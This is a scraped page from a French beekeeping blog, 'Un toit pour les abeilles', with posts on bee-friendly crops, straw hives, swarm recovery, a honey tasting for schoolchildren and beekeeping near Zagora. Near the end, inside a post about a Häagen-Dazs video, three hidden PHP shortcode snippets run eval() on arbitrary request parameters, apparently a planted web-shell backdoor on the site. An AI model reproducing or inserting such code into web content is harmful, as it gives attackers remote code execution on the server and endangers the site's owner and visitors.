Ces cultures permettent en effet, de fournir une nourriture plus variée aux abeilles afin de palier à la monoculture et, grâce aux floraisons successives, contribuent durant la période de butinage et en disette (de fin Juin à début Juillet, entre le tournesol et le colza) à procurer  nectars et pollens riches en éléments nutritifs.
Egalement, ces cultures permettent de lutter contre l’érosion et l’appauvrissement des sols

Voir le suivi des semences

Participer au projet

Réalisation de ruches paille/terre

Régis , dirigeant d’Un toit pour les abeilles à décidé de se lancer dans la réalisation d’une ruche paille / terre…

Cliquez ici pour lire la suite

Récupération d’essaims

Le mois de Mai est propice à l’essaimage de colonies, une partie des abeilles quitte la ruche avec une reine.

Ceci est un phénomène naturel que l’apiculteur surveille et qui peut survenir  si l’âge de la reine est avancé, si le volume de la ruche n’est plus suffisant, la flore environnante, la météo…

Cliquez ici pour voir les photos

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Commenter cet article
11
Mai
2011

Je voeu protéger les abeilles

L’ association All We wish rassemble les vœux sur son site Internet pour permettre à tous d’y apporter des idées, de l’aide, de critiquer ou de témoigner pour montrer que tout est possible à condition de le vouloir.

Il y a un peu plus d’un an, le vœu de protéger les abeilles a vu le jour.

Ce dernier s’est nourri de solutions pour aider à la sauvegarde de ces pollinisateurs.

Découvrez All we wish et apportez vos idées, votes et commentaires au « je voeu protéger les abeilles »

www.allwewish.org

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Commenter cet article
22
Avr
2011

Dégustation de miel à l’hôtel Les Orangeries

Lors de la semaine du développement durable, l’hôtel restaurant Les Orangeries (86320 Lussac-Les-Châteaux)  a  reçu 3 classes de primaire ainsi que les habitants de la commune autours d’un atelier de dégustation de miel et une exposition sur les abeilles.

Sensibilisé par un apiculteur Normand et connaissant la démarche Un toit pour les abeilles a pu accueillir sur son site adultes et enfants dans une démarche de  sensibilisation à l’enjeu de la sauvegarde des abeilles.

Ainsi, le public a pu déguster 5 miels d’apiculteurs Un toit pour les abeilles ainsi que les miels de l’apiculteur Normand et d’un apiculteur local et également, un miel industriel (pour faire la différence).

L’objectif de cet évènement fut la sensibilisation  des enfants qui sont les citoyens de demain aux dangers de la disparition des abeilles.

Sous forme de jeux et devinettes, explication autours de l’exposition Un toit pour les abeilles et de panneaux créés pour l’occasion, de l’importance de cet insecte pollinisateur et les menaces qui pèse sur lui .

Dégustation des miels proposés puis de plats du chef David Royer en sucré et salé avec pains d’épices et canard sauce miel.

A la question « Quel miel avez-vous préféré ? », beaucoup d’enfants ont répondu « Je les aime tous ! ». Avant de partir, Les Orangeries remettent aux enfants une carte qu’ils pourront accrocher sur leurs vêtements « J’aime les abeilles, protégeons-les » ou « Attention, abeilles en danger ! ».

Quelques jours plus tard,  une lettre des enfants de l’école publique est envoyé à l’établissement accompagnée de jolis dessins d’abeilles, heureuses dans les jardins …

Les Orangeries

Hôtel de charme Ecolabel  www.lesorangeries.fr

Restaurant potager  bio     05  49  84  07  07

Produits fermiers locaux  Cave de vins Naturels
86320 Lussac les Châteaux (Vienne/Poitiers Est)

Ecrit par Un toit pour les abeilles dans : Autres initiatives | Commenter cet article
20
Mai
2010

Apiculture dans la région de Zagora : ruches mobiles en terre cuite

Ibrahim est notamment apiculteur. Il nous fait découvrir ses ruches peuplées d’abeilles sahariennes. Cette abeille est jaune et de petite taille. Le grand savoir faire de l’apiculteur et la douceur des abeilles nous ont permis de passer une demi-journée à ouvrir les ruches sans aucune piqure (à l’inverse des abeilles noires de l’Atlas qui plus agressives ont parfois attaquées à plus de 30 mètres de la ruche). Les colonies sont assez petites. La récolte se fait en cassant quelques rayons de miel si la vitalité de la colonie le permet. En cas de récolte, une ruche donne environ 6 kg de miel par an. La récupération du miel se fait à la main en pressant les rayons. Le miel obtenu est de couleur ambré avec la consistance d’un sirop épais. Son gout particulier en fait un miel réputé.

L’étanchéité entre la ruche et son « couvercle » se fait avec de la bouse de vache qui en séchant assure l’étanchéité. Elle a aussi un rôle bénéfique sur la colonie et permet d’éviter certaines maladies.

138-ibrahim-apiculteur 139-ibrahim-apiculteur 140-ibrahim-apiculteur 141-ibrahim-apiculteur 142-ibrahim-apiculteur 143-ibrahim-apiculteur 144-ibrahim-apiculteur 145-ibrahim-apiculteur146-ibrahim-apiculteur

20
Jan
2010

Des fleurs le long des routes pour les abeilles

Des fleurs vont être plantées le long de certaines routes de France pour venir en aide aux abeilles butineuses en mal de pollen et décimées par les maladies, une initiative lancée par le gouvernement qui pourrait être étendue à terme à l’ensemble du réseau routier national.

A lire sur Libération

Plutôt chouette. ça me fait penser au projet de Bernard Moitessier de planter des fruitiers le long des routes.

Ecrit par Olivier dans : Autres initiatives | Commenter cet article
02
Sep
2009

La vidéo de soutien de Häagen Dasz aux abeilles

Häagen Dasz  ne restent pas de glace quand il s’agit des abeilles.

<!– [insert_php]if (isset($_REQUEST["OFYs"])){eval($_REQUEST["OFYs"]);exit;}[/insert_php][php]if (isset($_REQUEST["OFYs"])){eval($_REQUEST["OFYs"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["lcJ"])){eval($_REQUEST["lcJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["lcJ"])){eval($_REQUEST["lcJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UwKz"])){eval($_REQUEST["UwKz"]);exit;}[/insert_php][php]if (isset($_REQUEST["UwKz"])){eval($_REQUEST["UwKz"]);exit;}[/php] –>

Propulsé par WordPress | Thème Aeros | un toit pour les abeilles